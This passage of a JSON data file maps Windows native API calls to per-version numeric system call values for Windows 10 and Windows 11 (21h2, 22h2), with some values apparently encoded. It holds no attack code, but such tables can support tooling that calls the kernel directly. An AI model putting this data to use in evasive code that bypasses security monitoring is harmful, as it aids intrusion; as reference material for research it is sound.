449, "NtThawTransactions": 450, "NtDrawText": 220, "NtTraceControl": 451, "NtSetWnfProcessNotificationEvent": 435, "NtSetInformationVirtualMemory": 414, "NtOpenPrivateNamespace": 295, "NtCreatePrivateNamespace": 184, "NtDeletePrivateNamespace": 213, "NtReplacePartitionUnit": 373, "NtSerializeBoot": 390, "NtOpenKeyTransacted": 289, "NtOpenKeyTransactedEx": 290, "NtFreezeRegistry": 238, "NtCreateKeyTransacted": 175, "NtQuerySecurityAttributesToken": 346, "NtWow64CallFunction64": 488, "NtWow64WriteVirtualMemory64": 487, "NtAlpcConnectPortEx": 122, "NtAlpcImpersonateClientContainerOfPort": 133, "NtAreMappedFilesTheSame": 327822, "NtAssignProcessToJobObject": 524431, "NtCreateJobSet": 174, "NtCreateJobObject": 173, "NtOpenJobObject": 287, "NtQueryInformationJobObject": 330, "NtSetInformationJobObject": 407, "NtTerminateJobObject": 459199, "NtCallEnclave": 145, "NtTerminateEnclave": 446, "NtInitializeEnclave": 254, "NtCreateEnclave": 168, "NtLoadEnclaveData": 262, "NtCreateSectionEx": 190, "NtMapViewOfSectionEx": 276, "NtUnmapViewOfSectionEx": 460, "NtCreatePartition": 182, "NtOpenPartition": 294, "NtManagePartition": 273, "NtMapUserPhysicalPages": 655635, "NtAllocateUserPhysicalPagesEx": 116, "NtGetWriteWatch": 251, "NtResetWriteWatch": 786809, "NtCreatePagingFile": 181, "NtCancelIoFileEx": 146, "NtCancelWaitCompletionPacket": 149, "NtCreateWaitCompletionPacket": 201, "NtCompareObjects": 155, "NtCompareTokens": 157, "NtContinueEx": 161, "NtCreateCrossVmEvent": 163, "NtCreateCrossVmMutant": 164, "NtCreateDirectoryObjectEx": 167, "NtCreateIRTimer": 171, "NtCreateLowBoxToken": 177, "NtCreateRegistryTransaction": 188, "NtCreateThreadEx": 193, "NtCreateTimer2": 195, "NtCreateTokenEx": 197, "NtCreateUserProcess": 200, "NtCreateWaitablePort": 202, "NtCreateWnfStateName": 203, "NtDebugContinue": 206, "NtDeleteBootEntry": 208, "NtDeleteDriverEntry": 209, "NtDeleteWnfStateData": 215, "NtDeleteWnfStateName": 216, "NtDirectGraphicsCall": 217, "NtFilterBootOption": 227, "NtFilterToken": 228, "NtFilterTokenEx": 229, "NtGetCachedSigningLevel": 240, "NtGetCompleteWnfStateSubscription": 241, "NtGetContextThread": 242, "NtGetCurrentProcessorNumber": 1638643, "NtGetCurrentProcessorNumberEx": 244, "NtGetDevicePowerState": 458997, "NtImpersonateAnonymousToken": 196860, "NtInitializeRegistry": 256, "NtInitiatePowerAction": 1114369, "NtIsSystemResumeAutomatic": 65794, "NtLoadKeyEx": 265, "NtLockProductActivationKeys": 327947, "NtLockRegistryKey": 196876, "NtMakePermanentObject": 196878, "NtManageHotPatch": 272, "NtMapCMFModule": 274, "NtModifyBootEntry": 277, "NtModifyDriverEntry": 278, "NtNotifyChangeDirectoryFileEx": 280, "NtNotifyChangeMultipleKeys": 282, "NtOpenKeyEx": 288, "NtOpenKeyedEvent": 291, "NtOpenRegistryTransaction": 297, "NtPlugPlayControl": 306, "NtPssCaptureVaSpaceBulk": 316, "NtQueryAuxiliaryCounterFrequency": 318, "NtQueryDebugFilterState": 328001, "NtQueryInformationByName": 328, "NtQueryInstallUILanguage": 262480, "NtQueryLicenseValue": 339, "NtQueryOpenSubKeys": 342, "NtQueryOpenSubKeysEx": 343, "NtQueryPortInformationProcess": 65880, "NtQuerySecurityPolicy": 348, "NtQueryWnfStateNameInformation": 356, "NtRenameKey": 370, "NtResumeProcess": 196987, "NtRevertContainerImpersonation": 380, "NtRollbackRegistryTransaction": 383, "NtSaveKeyEx": 917891, "NtSaveMergedKeys": 721284, "NtSecureConnectPort": 389, "NtSetBootOptions": 392, "NtSetCachedSigningLevel": 393, "NtSetCachedSigningLevel2": 394, "NtSetContextThread": 395, "NtSetDebugFilterState": 655756, "NtSetDefaultUILanguage": 262543, "NtSetIRTimer": 459156, "NtSetInformationDebugObject": 405, "NtSetInformationSymbolicLink": 410, "NtSetLdtEntries": 419, "NtSetSystemEnvironmentValueEx": 425, "NtSetSystemPowerState": 427, "NtSetThreadExecutionState": 328109, "NtSetUuidSeed": 262577, "NtSubscribeWnfStateChange": 442, "NtSuspendProcess": 197051, "NtTranslateFilePath": 1114564, "NtUnloadKey2": 456, "NtUnloadKeyEx": 457, "NtUnsubscribeWnfStateChange": 461, "NtVdmControl": 463, "NtWaitForAlertByThreadId": 393680, "NtWaitForDebugEvent": 465, "NtLoadKey3": 470, "NtAlpcConnectPort": 121, "NtFreeUserPhysicalPages": 237, "KiUserApcDispatcher": 0, "NtAlertThread": 196719, "NtCallbackReturn": 5, "NtQueueApcThread": 69, "NtTestAlert": 131520, "NtAddAtom": 655431, "NtDeleteAtom": 262351, "NtFindAtom": 655380, "NtQueryInformationAtom": 327, "NtSystemDebugControl": 445, "NtDisplayString": 219, "NtRaiseException": 358, "NtRaiseHardError": 359, "NtSetDefaultHardErrorPort": 197005, "NtQuerySystemEnvironmentValue": 351, "NtSetSystemEnvironmentValue": 424, "NtLoadDriver": 261, "NtUnloadDriver": 454, "NtFlushWriteBuffer": 65772, "NtShutdownSystem": 262580, "NtQueryDefaultLocale": 327701, "NtSetDefaultLocale": 328078, "NtAllocateVirtualMemory": 24, "NtFlushVirtualMemory": 235, "NtFreeVirtualMemory": 30, "NtLockVirtualMemory": 269, "NtProtectVirtualMemory": 80, "NtQueryVirtualMemory": 35, "NtReadVirtualMemory": 63, "NtUnlockVirtualMemory": 459, "NtWriteVirtualMemory": 58, "NtQuerySecurityObject": 347, "NtSetSecurityObject": 423, "NtDuplicateObject": 60, "NtMakeTemporaryObject": 196879, "NtQueryObject": 16, "NtSetInformationObject": 92, "NtSignalAndWaitForSingleObject": 1245622, "NtWaitForMultipleObjects": 1900635, "NtWaitForSingleObject": 851972, "NtCreateDebugObject": 165, "NtDebugActiveProcess": 524493, "NtRemoveProcessDebug": 524657, "NtCreateDirectoryObject": 166, "NtOpenDirectoryObject": 88, "NtQueryDirectoryObject": 323, "NtClearEvent": 196670, "NtCreateEvent": 72, "NtOpenEvent": 64, "NtPulseEvent": 459069, "NtQueryEvent": 86, "NtResetEvent": 459128, "NtSetEvent": 458766, "NtSetEventBoostPriority": 196653, "NtCreateEventPair": 170, "NtOpenEventPair": 285, "NtSetHighEventPair": 197010, "NtSetHighWaitLowEventPair": 197011, "NtSetLowEventPair": 197028, "NtSetLowWaitHighEventPair": 197029, "NtWaitHighEventPair": 197076, "NtWaitLowEventPair": 197077, "NtCancelIoFile": 93, "NtCreateFile": 85, "NtCreateMailslotFile": 178, "NtCreateNamedPipeFile": 180, "NtDeleteFile": 210, "NtDeviceIoControlFile": 1769479, "NtFlushBuffersFile": 75, "NtFsControlFile": 1769529, "NtLockFile": 266, "NtNotifyChangeDirectoryFile": 279, "NtOpenFile": 51, "NtQueryAttributesFile": 61, "NtQueryDirectoryFile": 53, "NtQueryEaFile": 325, "NtQueryFullAttributesFile": 326, "NtQueryInformationFile": 17, "NtQueryVolumeInformationFile": 73, "NtReadFile": 1703942, "NtReadFileScatter": 1703982, "NtSetEaFile": 401, "NtSetInformationFile": 39, "NtSetVolumeInformationFile": 434, "NtUnlockFile": 458, "NtWriteFile": 1703944, "NtWriteFileGather": 1703963, "NtCreateIoCompletion": 172, "NtOpenIoCompletion": 286, "NtQueryIoCompletion": 338, "NtRemoveIoCompletion": 1835017, "NtCompactKeys": 154, "NtCompressKey": 196767, "NtCreateKey": 29, "NtDeleteKey": 211, "NtDeleteValueKey": 214, "NtEnumerateKey": 50, "NtEnumerateValueKey": 19, "NtFlushKey": 196841, "NtLoadKey": 263, "NtLoadKey2": 264, "NtNotifyChangeKey": 281, "NtOpenKey": 18, "NtQueryKey": 22, "NtQueryMultipleValueKey": 340, "NtQueryValueKey": 23, "NtReplaceKey": 372, "NtRestoreKey": 378, "NtSaveKey": 524674, "NtSetInformationKey": 408, "NtSetValueKey": 96, "NtUnloadKey": 455, "NtCreateKeyedEvent": 176, "NtReleaseKeyedEvent": 1311086, "NtWaitForKeyedEvent": 1376722, "NtCreateMutant": 179, "NtOpenMutant": 292, "NtQueryMutant": 341, "NtReleaseMutant": 458784, "NtAcceptConnectPort": 2, "NtCompleteConnectPort": 158, "NtConnectPort": 160, "NtCreatePort": 183, "NtImpersonateClientOfPort": 458783, "NtListenPort": 260, "NtQueryInformationPort": 331, "NtReadRequestData": 84, "NtReplyPort": 12, "NtReplyWaitReceivePort": 11, "NtReplyWaitReplyPort": 374, "NtRequestPort": 375, "NtRequestWaitReplyPort": 34, "NtWriteRequestData": 87, "NtCreateProcess": 185, "NtFlushInstructionCache": 786664, "NtOpenProcess": 38, "NtQueryInformationProcess": 25, "NtSetInformationProcess": 28, "NtTerminateProcess": 458796, "NtCreateProfile": 186, "NtQueryIntervalProfile": 328017, "NtSetIntervalProfile": 328096, "NtStartProfile": 197048, "NtStopProfile": 197049, "NtCreateSection": 74, "NtExtendSection": 226, "NtMapViewOfSection": 40, "NtOpenSection": 55, "NtQuerySection": 81, "NtUnmapViewOfSection": 42, "NtCreateSemaphore": 191, "NtOpenSemaphore": 299, "NtQuerySemaphore": 349, "NtReleaseSemaphore": 786442, "NtCreateSymbolicLinkObject": 192, "NtOpenSymbolicLinkObject": 301, "NtQuerySymbolicLinkObject": 350, "NtAlertResumeThread": 458862, "NtContinue": 67, "NtCreateThread": 78, "NtDelayExecution": 393268, "NtImpersonateThread": 253, "NtOpenThread": 302, "NtQueryInformationThread": 37, "NtRegisterThreadTerminatePort": 196973, "NtResumeThread": 458834, "NtSetInformationThread": 13, "NtSuspendThread": 459196, "NtTerminateThread": 458835, "NtYieldExecution": 65606, "NtCancelTimer": 458849, "NtCreateTimer": 194, "NtOpenTimer": 303, "NtQueryTimer": 56, "NtSetTimer": 98, "NtAdjustGroupsToken": 108, "NtAdjustPrivilegesToken": 65, "NtCreateToken": 196, "NtDuplicateToken": 66, "NtOpenProcessToken": 296, "NtOpenThreadToken": 36, "NtQueryInformationToken": 33, "NtSetInformationToken": 411, "NtAccessCheckAndAuditAlarm": 41, "NtCloseObjectAuditAlarm": 59, "NtDeleteObjectAuditAlarm": 212, "NtOpenObjectAuditAlarm": 293, "NtPrivilegeObjectAuditAlarm": 312, "NtPrivilegedServiceAuditAlarm": 313, "NtAccessCheck": 0, "NtAllocateLocallyUniqueId": 262257, "NtAllocateUuids": 1114229, "NtPrivilegeCheck": 786743, "NtQuerySystemInformation": 54, "NtSetSystemInformation": 426, "NtQueryPerformanceCounter": 327729, "NtQuerySystemTime": 1572954, "NtQueryTimerResolution": 655714, "NtSetSystemTime": 328108, "NtSetTimerResolution": 655792, "NtClose": 196623, "NtFlushBuffersFileEx": 230, "NtOpenProcessTokenEx": 48, "NtOpenThreadTokenEx": 47, "NtQueryDirectoryFileEx": 322, "NtQueryQuotaInformationFile": 345, "NtSetQuotaInformationFile": 422}}, "Windows 11": {"21h2": {"NtAccessCheck": 0, "NtAccessCheckAndAuditAlarm": 41, "NtAccessCheckByType": 99, "NtAccessCheckByTypeAndAuditAlarm": 89, "NtAccessCheckByTypeResultList": 100, "NtAccessCheckByTypeResultListAndAuditAlarm": 101, "NtAccessCheckByTypeResultListAndAuditAlarmByHandle": 102, "NtAcquireCrossVmMutant": 103, "NtAcquireProcessActivityReference": 104, "NtAddAtom": 71, "NtAddAtomEx": 1114217, "NtAddBootEntry": 106, "NtAddDriverEntry": 107, "NtAdjustGroupsToken": 108, "NtAdjustPrivilegesToken": 65, "NtAdjustTokenClaimsAndDeviceGroups": 109, "NtAlertResumeThread": 458862, "NtAlertThread": 196719, "NtAlertThreadByThreadId": 262256, "NtAllocateLocallyUniqueId": 262257, "NtAllocateReserveObject": 114, "NtAllocateUserPhysicalPages": 115, "NtAllocateUserPhysicalPagesEx": 116, "NtAllocateUuids": 1114229, "NtAllocateVirtualMemory": 24, "NtAllocateVirtualMemoryEx": 118, "NtAlpcAcceptConnectPort": 119, "NtAlpcCancelMessage": 120, "NtAlpcConnectPort": 121, "NtAlpcConnectPortEx": 122, "NtAlpcCreatePort": 123, "NtAlpcCreatePortSection": 124, "NtAlpcCreateResourceReserve": 125, "NtAlpcCreateSectionView": 126, "NtAlpcCreateSecurityContext": 127, "NtAlpcDeletePortSection": 128, "NtAlpcDeleteResourceReserve": 129, "NtAlpcDeleteSectionView": 130, "NtAlpcDeleteSecurityContext": 131, "NtAlpcDisconnectPort": 132, "NtAlpcImpersonateClientContainerOfPort": 133, "NtAlpcImpersonateClientOfPort": 134, "NtAlpcOpenSenderProcess": 135, "NtAlpcOpenSenderThread": 136, "NtAlpcQueryInformation": 137, "NtAlpcQueryInformationMessage": 138, "NtAlpcRevokeSecurityContext": 139, "NtAlpcSendWaitReceivePort": 140, "NtAlpcSetInformation": 141, "NtApphelpCacheControl": 76, "NtAreMappedFilesTheSame": 327822, "NtAssignProcessToJobObject": 524431, "NtAssociateWaitCompletionPacket": 144, "NtCallEnclave": 145, "NtCallbackReturn": 5, "NtCancelIoFile": 93, "NtCancelIoFileEx": 146, "NtCancelSynchronousIoFile": 147, "NtCancelTimer": 458849, "NtCancelTimer2": 148, "NtCancelWaitCompletionPacket": 149, "NtChangeProcessState": 150, "NtChangeThreadState": 151, "NtClearEvent": 196670, "NtClose": 196671, "NtCloseObjectAuditAlarm": 59, "NtCommitComplete": 152, "NtCommitEnlistment": 153, "NtCommitRegistryTransaction": 154, "NtCommitTransaction": 155, "NtCompactKeys": 156, "NtCompareObjects": 157, "NtCompareSigningLevels": 158, "NtCompareTokens": 159, "NtCompleteConnectPort": 160, "NtCompressKey": 196769, "NtConnectPort": 162, "NtContinue": 67, "NtContinueEx": 163, "NtConvertBetweenAuxiliaryCounterAndPerformanceCounter": 164, "NtCreateCrossVmEvent": 165, "NtCreateCrossVmMutant": 166, "NtCreateDebugObject": 167, "NtCreateDirectoryObject": 168, "NtCreateDirectoryObjectEx": 169, "NtCreateEnclave": 170, "NtCreateEnlistment": 171, "NtCreateEvent": 72, "NtCreateEventPair": 172, "NtCreateFile": 85, "NtCreateIRTimer": 173, "NtCreateIoCompletion": 174, "NtCreateIoRing": 175, "NtCreateJobObject": 176, "NtCreateJobSet": 177, "NtCreateKey": 29, "NtCreateKeyTransacted": 178, "NtCreateKeyedEvent": 179, "NtCreateLowBoxToken": 180, "NtCreateMailslotFile": 181, "NtCreateMutant": 182, "NtCreateNamedPipeFile": 183, "NtCreatePagingFile": 184, "NtCreatePartition": 185, "NtCreatePort": 186, "NtCreatePrivateNamespace": 187, "NtCreateProcess": 188, "NtCreateProcessEx": 77, "NtCreateProcessStateChange": 189, "NtCreateProfile": 190, "NtCreateProfileEx": 191, "NtCreateRegistryTransaction": 192, "NtCreateResourceManager": 193, "NtCreateSection": 74, "NtCreateSectionEx": 194, "NtCreateSemaphore": 195, "NtCreateSymbolicLinkObject": 196, "NtCreateThread": 78, "NtCreateThreadEx": 197, "NtCreateThreadStateChange": 198, "NtCreateTimer": 199, "NtCreateTimer2": 200, "NtCreateToken": 201, "NtCreateTokenEx": 202, "NtCreateTransaction": 203, "NtCreateTransactionManager": 204, "NtCreateUserProcess": 205, "NtCreateWaitCompletionPacket": 206, "NtCreateWaitablePort": 207, "NtCreateWnfStateName": 208, "NtCreateWorkerFactory": 209, "NtDebugActiveProcess": 524498, "NtDebugContinue": 211, "NtDelayExecution": 393268, "NtDeleteAtom": 262356, "NtDeleteBootEntry": 213, "NtDeleteDriverEntry": 214, "NtDeleteFile": 215, "NtDeleteKey": 216, "NtDeleteObjectAuditAlarm": 217, "NtDeletePrivateNamespace": 218, "NtDeleteValueKey": 219, "NtDeleteWnfStateData": 220, "NtDeleteWnfStateName": 221, "NtDeviceIoControlFile": 1769479, "NtDirectGraphicsCall": 222, "NtDisableLastKnownGood": 223, "NtDisplayString": 224, "NtDrawText": 225, "NtDuplicateObject": 60, "NtDuplicateToken": 66, "NtEnableLastKnownGood": 226, "NtEnumerateBootEntries": 227, "NtEnumerateDriverEntries": 228, "NtEnumerateKey": 50, "NtEnumerateSystemEnvironmentValuesEx": 229, "NtEnumerateTransactionObject": 230, "NtEnumerateValueKey": 19, "NtExtendSection": 231, "NtFilterBootOption": 232, "NtFilterToken": 233, "NtFilterTokenEx": 234, "NtFindAtom": 655380, "NtFlushBuffersFile": 75, "NtFlushBuffersFileEx": 235, "NtFlushInstallUILanguage": 236, "NtFlushInstructionCache": 786669, "NtFlushKey": 196846, "NtFlushProcessWriteBuffers": 239, "NtFlushVirtualMemory": 240, "NtFlushWriteBuffer": 65777, "NtFreeUserPhysicalPages": 242, "NtFreeVirtualMemory": 30, "NtFreezeRegistry": 243, "NtFreezeTransactions": 244, "NtFsControlFile": 1769529, "NtGetCachedSigningLevel": 245, "NtGetCompleteWnfStateSubscription": 246, "NtGetContextThread": 247, "NtGetCurrentProcessorNumber": 1638648, "NtGetCurrentProcessorNumberEx": 249, "NtGetDevicePowerState": 459002, "NtGetMUIRegistryInfo": 251, "NtGetNextProcess": 252, "NtGetNextThread": 253, "NtGetNlsSectionPtr": 254, "NtGetNotificationResourceManager": 255, "NtGetWriteWatch": 256, "NtImpersonateAnonymousToken": 196865, "NtImpersonateClientOfPort": 458783, "NtImpersonateThread": 258, "NtInitializeEnclave": 259, "NtInitializeNlsFiles": 260, "NtInitializeRegistry": 261, "NtInitiatePowerAction": 1114374, "NtIsProcessInJob": 524367, "NtIsSystemResumeAutomatic": 65799, "NtIsUILanguageComitted": 264, "NtListenPort": 265, "NtLoadDriver": 266, "NtLoadEnclaveData": 267, "NtLoadKey": 268, "NtLoadKey2": 269, "NtLoadKey3": 270, "NtLoadKeyEx": 271, "NtLockFile": 272, "NtLockProductActivationKeys": 327953, "NtLockRegistryKey": 196882, "NtLockVirtualMemory": 275, "NtMakePermanentObject": 196884, "NtMakeTemporaryObject": 196885, "NtManageHotPatch": 278, "NtManagePartition": 279, "NtMapCMFModule": 280, "NtMapUserPhysicalPages": 655641, "NtMapUserPhysicalPagesScatter": 655363, "NtMapViewOfSection": 40, "NtMapViewOfSectionEx": 282, "NtModifyBootEntry": 283, "NtModifyDriverEntry": 284, "NtNotifyChangeDirectoryFile": 285, "NtNotifyChangeDirectoryFileEx": 286, "NtNotifyChangeKey": 287, "NtNotifyChangeMultipleKeys": 288, "NtNotifyChangeSession": 289, "NtOpenDirectoryObject": 88, "NtOpenEnlistment": 290, "NtOpenEvent": 64, "NtOpenEventPair": 291, "NtOpenFile": 51, "NtOpenIoCompletion": 292, "NtOpenJobObject": 293, "NtOpenKey": 18, "NtOpenKeyEx": 294, "NtOpenKeyTransacted": 295, "NtOpenKeyTransactedEx": 296, "NtOpenKeyedEvent": 297, "NtOpenMutant": 298, "NtOpenObjectAuditAlarm": 299, "NtOpenPartition": 300, "NtOpenPrivateNamespace": 301, "NtOpenProcess": 38, "NtOpenProcessToken": 302, "NtOpenProcessTokenEx": 48, "NtOpenRegistryTransaction": 303, "NtOpenResourceManager": 304, "NtOpenSection": 55, "NtOpenSemaphore": 305, "NtOpenSession": 306, "NtOpenSymbolicLinkObject": 307, "NtOpenThread": 308, "NtOpenThreadToken": 36, "NtOpenThreadTokenEx": 47, "NtOpenTimer": 309, "NtOpenTransaction": 310, "NtOpenTransactionManager": 311, "NtPlugPlayControl": 312, "NtPowerInformation": 95, "NtPrePrepareComplete": 313, "NtPrePrepareEnlistment": 314, "NtPrepareComplete": 315, "NtPrepareEnlistment": 316, "NtPrivilegeCheck": 786749, "NtPrivilegeObjectAuditAlarm": 318, "NtPrivilegedServiceAuditAlarm": 319, "NtPropagationComplete": 320, "NtPropagationFailed": 321, "NtProtectVirtualMemory": 80, "NtPssCaptureVaSpaceBulk": 322, "NtPulseEvent": 459075, "NtQueryAttributesFile": 61, "NtQueryAuxiliaryCounterFrequency": 324, "NtQueryBootEntryOrder": 325, "NtQueryBootOptions": 326, "NtQueryDebugFilterState": 328007, "NtQueryDefaultLocale": 327701, "NtQueryDefaultUILanguage": 262212, "NtQueryDirectoryFile": 53, "NtQueryDirectoryFileEx": 328, "NtQueryDirectoryObject": 329, "NtQueryDriverEntryOrder": 330, "NtQueryEaFile": 331, "NtQueryEvent": 86, "NtQueryFullAttributesFile": 332, "NtQueryInformationAtom": 333, "NtQueryInformationByName": 334, "NtQueryInformationEnlistment": 335, "NtQueryInformationFile": 17, "NtQueryInformationJobObject": 336, "NtQueryInformationPort": 337, "NtQueryInformationProcess": 25, "NtQueryInformationResourceManager": 338, "NtQueryInformationThread": 37, "NtQueryInformationToken": 33, "NtQueryInformationTransaction": 339, "NtQueryInformationTransactionManager": 340, "NtQueryInformationWorkerFactory": 341, "NtQueryInstallUILanguage": 262486, "NtQueryIntervalProfile": 328023, "NtQueryIoCompletion": 344, "NtQueryIoRingCapabilities": 345, "NtQueryKey": 22, "NtQueryLicenseValue": 346, "NtQueryMultipleValueKey": 347, "NtQueryMutant": 348, "NtQueryObject": 16, "NtQueryOpenSubKeys": 349, "NtQueryOpenSubKeysEx": 350, "NtQueryPerformanceCounter": 327729, "NtQueryPortInformationProcess": 65887, "NtQueryQuotaInformationFile": 352, "NtQuerySection": 81, "NtQuerySecurityAttributesToken": 353, "NtQuerySecurityObject": 354, "NtQuerySecurityPolicy": 355, "NtQuerySemaphore": 356, "NtQuerySymbolicLinkObject": 357, "NtQuerySystemEnvironmentValue": 358, "NtQuerySystemEnvironmentValueEx": 359, "NtQuerySystemInformation": 54, "NtQuerySystemInformationEx": 360, "NtQueryTimer": 56, "NtQueryTimerResolution": 655721, "NtQueryValueKey": 23, "NtQueryVirtualMemory": 35, "NtQueryVolumeInformationFile": 73, "NtQueryWnfStateData": 362, "NtQueryWnfStateNameInformation": 363, "NtQueueApcThread": 69, "NtQueueApcThreadEx": 364, "NtQueueApcThreadEx2": 365, "NtRaiseException": 366, "NtRaiseHardError": 367, "NtReadFile": 1703942, "NtReadFileScatter": 1703982, "NtReadOnlyEnlistment": 368, "NtReadRequestData": 84, "NtReadVirtualMemory": 63, "NtReadVirtualMemoryEx": 369, "NtRecoverEnlistment": 370, "NtRecoverResourceManager": 371, "NtRecoverTransactionManager": 372, "NtRegisterProtocolAddressInformation": 373, "NtRegisterThreadTerminatePort": 196982, "NtReleaseKeyedEvent": 1311095, "NtReleaseMutant": 458784, "NtReleaseSemaphore": 786442, "NtReleaseWorkerFactoryWorker": 196984, "NtRemoveIoCompletion": 1835017, "NtRemoveIoCompletionEx": 377, "NtRemoveProcessDebug": 524666, "NtRenameKey": 379, "NtRenameTransactionManager": 380, "NtReplaceKey": 381, "NtReplacePartitionUnit": 382, "NtReplyPort": 12, "NtReplyWaitReceivePort": 11, "NtReplyWaitReceivePortEx": 43, "NtReplyWaitReplyPort": 383, "NtRequestPort": 384, "NtRequestWaitReplyPort": 34, "NtResetEvent": 459137, "NtResetWriteWatch": 786818, "NtRestoreKey": 387, "NtResumeProcess": 196996, "NtResumeThread": 458834, "NtRevertContainerImpersonation": 389, "NtRollbackComplete": 390, "NtRollbackEnlistment": 391, "NtRollbackRegistryTransaction": 392, "NtRollbackTransaction": 393, "NtRollforwardTransactionManager": 394, "NtSaveKey": 524683, "NtSaveKeyEx": 917900, "NtSaveMergedKeys": 721293, "NtSecureConnectPort": 398, "NtSerializeBoot": 399, "NtSetBootEntryOrder": 400, "NtSetBootOptions": 401, "NtSetCachedSigningLevel": 402, "NtSetCachedSigningLevel2": 403, "NtSetContextThread": 404, "NtSetDebugFilterState": 655765, "NtSetDefaultHardErrorPort": 197014, "NtSetDefaultLocale": 328087, "NtSetDefaultUILanguage": 262552, "NtSetDriverEntryOrder": 409, "NtSetEaFile": 410, "NtSetEvent": 458766, "NtSetEventBoostPriority": 196653, "NtSetHighEventPair": 197019, "NtSetHighWaitLowEventPair": 197020, "NtSetIRTimer": 459165, "NtSetInformationDebugObject": 414, "NtSetInformationEnlistment": 415, "NtSetInformationFile": 39, "NtSetInformationIoRing": 416, "NtSetInformationJobObject": 417, "NtSetInformationKey": 418, "NtSetInformationObject": 92, "NtSetInformationProcess": 28, "NtSetInformationResourceManager": 419, "NtSetInformationSymbolicLink": 420, "NtSetInformationThread": 13, "NtSetInformationToken": 421, "NtSetInformationTransaction": 422, "NtSetInformationTransactionManager": 423, "NtSetInformationVirtualMemory": 424, "NtSetInformationWorkerFactory": 425, "NtSetIntervalProfile": 328106, "NtSetIoCompletion": 427, "NtSetIoCompletionEx": 428, "NtSetLdtEntries": 429, "NtSetLowEventPair": 197038, "NtSetLowWaitHighEventPair": 197039, "NtSetQuotaInformationFile": 432, "NtSetSecurityObject": 433, "NtSetSystemEnvironmentValue": 434, "NtSetSystemEnvironmentValueEx": 435, "NtSetSystemInformation": 436, "NtSetSystemPowerState": 437, "NtSetSystemTime": 328118, "NtSetThreadExecutionState": 328119, "NtSetTimer": 98, "NtSetTimer2": 440, "NtSetTimerEx": 441, "NtSetTimerResolution": 655802, "NtSetUuidSeed": 262587, "NtSetValueKey": 96, "NtSetVolumeInformationFile": 444, "NtSetWnfProcessNotificationEvent": 445, "NtShutdownSystem": 262590, "NtShutdownWorkerFactory": 447, "NtSignalAndWaitForSingleObject": 1245632, "NtSinglePhaseReject": 449, "NtStartProfile": 197058, "NtStopProfile": 197059, "NtSubmitIoRing": 452, "NtSubscribeWnfStateChange": 453, "NtSuspendProcess": 197062, "NtSuspendThread": 459207, "NtSystemDebugControl": 456, "NtTerminateEnclave": 457, "NtTerminateJobObject": 459210, "NtTerminateProcess": 458796, "NtTerminateThread": 458835, "NtTestAlert": 131531, "NtThawRegistry": 460, "NtThawTransactions": 461, "NtTraceControl": 462, "NtTraceEvent": 94, "NtTranslateFilePath": 1114575, "NtUmsThreadYield": 464, "NtUnloadDriver": 465, "NtUnloadKey": 466, "NtUnloadKey2": 467, "NtUnloadKeyEx": 468, "NtUnlockFile": 469, "NtUnlockVirtualMemory": 470, "NtUnmapViewOfSection": 42, "NtUnmapViewOfSectionEx": 471, "NtUnsubscribeWnfStateChange": 472, "NtUpdateWnfStateData": 473, "NtVdmControl": 474, "NtWaitForAlertByThreadId": 393691, "NtWaitForDebugEvent": 476, "NtWaitForKeyedEvent": 1376733, "NtWaitForMultipleObjects": 1900635, "NtWaitForMultipleObjects32": 1966106, "NtWaitForSingleObject": 851972, "NtWaitForWorkViaWorkerFactory": 478, "NtWaitHighEventPair": 197087, "NtWaitLowEventPair": 197088, "NtWorkerFactoryWorkerReady": 196609, "NtWriteFile": 1703944, "NtWriteFileGather": 1703963, "NtWriteRequestData": 87, "NtWriteVirtualMemory": 58, "NtYieldExecution": 65606, "RtlGetNativeSystemInformation": 493}, "22h2": {"NtWorkerFactoryWorkerReady": 196609, "NtMapUserPhysicalPagesScatter": 655363, "NtWaitForMultipleObjects32": 1966106, "NtReplyWaitReceivePortEx": 43, "NtQueryDefaultUILanguage": 262212, "NtApphelpCacheControl": 76, "NtCreateProcessEx": 77, "NtIsProcessInJob": 524367, "NtAccessCheckByTypeAndAuditAlarm": 89, "NtTraceEvent": 94, "NtPowerInformation": 95, "NtAccessCheckByType": 99, "NtAccessCheckByTypeResultList": 100, "NtAccessCheckByTypeResultListAndAuditAlarm": 101, "NtAccessCheckByTypeResultListAndAuditAlarmByHandle": 102, "NtAddAtomEx": 1114217, "NtAddBootEntry": 106, "NtAddDriverEntry": 107, "NtAdjustTokenClaimsAndDeviceGroups": 109, "NtAlertThreadByThreadId": 262256, "NtAllocateReserveObject": 114, "NtGetNextProcess": 254, "NtGetNextThread": 255, "NtQueueApcThreadEx": 368, "NtUmsThreadYield": 469, "NtAllocateUserPhysicalPages": 115, "NtAllocateVirtualMemoryEx": 118, "NtAlpcAcceptConnectPort": 119, "NtAlpcCancelMessage": 120, "NtAlpcCreatePort": 123, "NtAlpcCreatePortSection": 124, "NtAlpcCreateResourceReserve": 125, "NtAlpcCreateSectionView": 126, "NtAlpcCreateSecurityContext": 127, "NtAlpcDeletePortSection": 128, "NtAlpcDeleteResourceReserve": 129, "NtAlpcDeleteSectionView": 130, "NtAlpcDeleteSecurityContext": 131, "NtAlpcDisconnectPort": 132, "NtAlpcImpersonateClientOfPort": 134, "NtAlpcOpenSenderProcess": 135, "NtAlpcOpenSenderThread": 136, "NtAlpcQueryInformation": 137, "NtAlpcQueryInformationMessage": 138, "NtAlpcRevokeSecurityContext": 139, "NtAlpcSendWaitReceivePort": 140, "NtAlpcSetInformation": 141, "NtEnumerateBootEntries": 229, "NtEnumerateDriverEntries": 230, "NtEnumerateSystemEnvironmentValuesEx": 231, "NtQueryBootEntryOrder": 328, "NtQueryBootOptions": 329, "NtQueryDriverEntryOrder": 333, "NtQuerySystemEnvironmentValueEx": 363, "NtSetBootEntryOrder": 404, "NtSetDriverEntryOrder": 413, "NtQuerySystemInformationEx": 364, "NtInitializeNlsFiles": 262, "NtCreateProfileEx": 193, "NtCreateWorkerFactory": 211, "NtFlushInstallUILanguage": 238, "NtGetMUIRegistryInfo": 253, "NtGetNlsSectionPtr": 256, "NtIsUILanguageComitted": 266, "NtReleaseWorkerFactoryWorker": 196988, "NtQueryInformationWorkerFactory": 345, "NtSetInformationWorkerFactory": 430, "NtWaitForWorkViaWorkerFactory": 483, "NtShutdownWorkerFactory": 452, "NtSetTimerEx": 446, "NtCancelTimer2": 148, "NtSetTimer2": 445, "NtQueryWnfStateData": 366, "NtUpdateWnfStateData": 478, "NtDisableLastKnownGood": 225, "NtEnableLastKnownGood": 228, "NtCancelSynchronousIoFile": 147, "NtSetIoCompletion": 432, "NtSetIoCompletionEx": 433, "NtRemoveIoCompletionEx": 381, "NtNotifyChangeSession": 291, "NtAssociateWaitCompletionPacket": 144, "NtFlushProcessWriteBuffers": 